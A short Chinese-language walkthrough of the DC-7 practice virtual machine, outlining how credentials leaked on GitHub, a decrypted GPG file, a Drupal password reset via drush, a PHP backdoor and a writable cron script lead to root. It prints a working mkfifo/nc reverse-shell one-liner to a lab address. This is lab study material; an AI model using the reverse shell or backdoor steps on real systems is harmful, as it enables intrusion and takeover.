DC靶机系列——DC-7练习

DC靶机系列——DC-7练习

DC-7的端口服务只有22和80端口，也就是ssh登录和web服务。
在探测web服务的过程中，没有找到相应的web漏洞。
这里就要想办法通过侧面来进攻，考验的是对信息的敏感性。发现有一个@DC7USER,放在谷歌搜索一下，发现一个twitter和github，在github里面存在敏感信息，猜测可能是ssh的密码，果然进入。

获取初步权限后，继续在低权限情况下进行信息收集。如列举系统用户，查看网站备份源码，查询线上数据库，查询定时脚本等。然后再一封邮件中发现了更多信息，定时脚本里也发现了执行脚本的历史记录，结果解密源码发现gpg的passphrase，通过解密敏感文件进一步获取mysql密码，获取之后可查看数据库，可获取前端web的账户名。

在定时脚本里面发现可以在特定位置执行特定命令。谷歌这些命令，发现其中一个是可以用来改web服务密码的，用来改密码，然后登陆进后台。

登陆进后台，搜集框架信息，基于对drupal的了解，可以编辑文章处插入php代码来执行菜刀后门。这个菜刀后门由msfvenom来生成。知识点:msfvenom生成后门及客户端的使用。

通过菜刀连接，可以获取www-data权限。通过这个账号，可以对定时脚本进行写入操作，这里写入一个bash菜刀后门，连接成功后即为root权限。

总体来说，有一次横向提权，一次纵向提权。
理论上来说，可读的定时脚本里面解密出来的东西，可以用来提取数据。
通过命令执行的四步跳(信息泄露，获取dc7user低权限账号，进行登录；drupal的框架命令执行修改密码，登录后台；文章的PHP代码上传菜刀后门，获取www-data权限; 定时任务，获取root权限)，可以获取最终root权限。

知识点：
1.ssh的使用
2.gpg加密解密的使用
3.mariaDB命令行获取数据，sql语句
4.msfvenom和msfconsole的使用
5.bash菜刀的使用, pipe的理解

rm /tmp/f;
mkfifo /tmp/f;    // make FIFOs named pipes
cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.99.101 4445 > /tmp/f

6.nc的使用与理解
7.drupal框架命令的使用与理解
特别是drush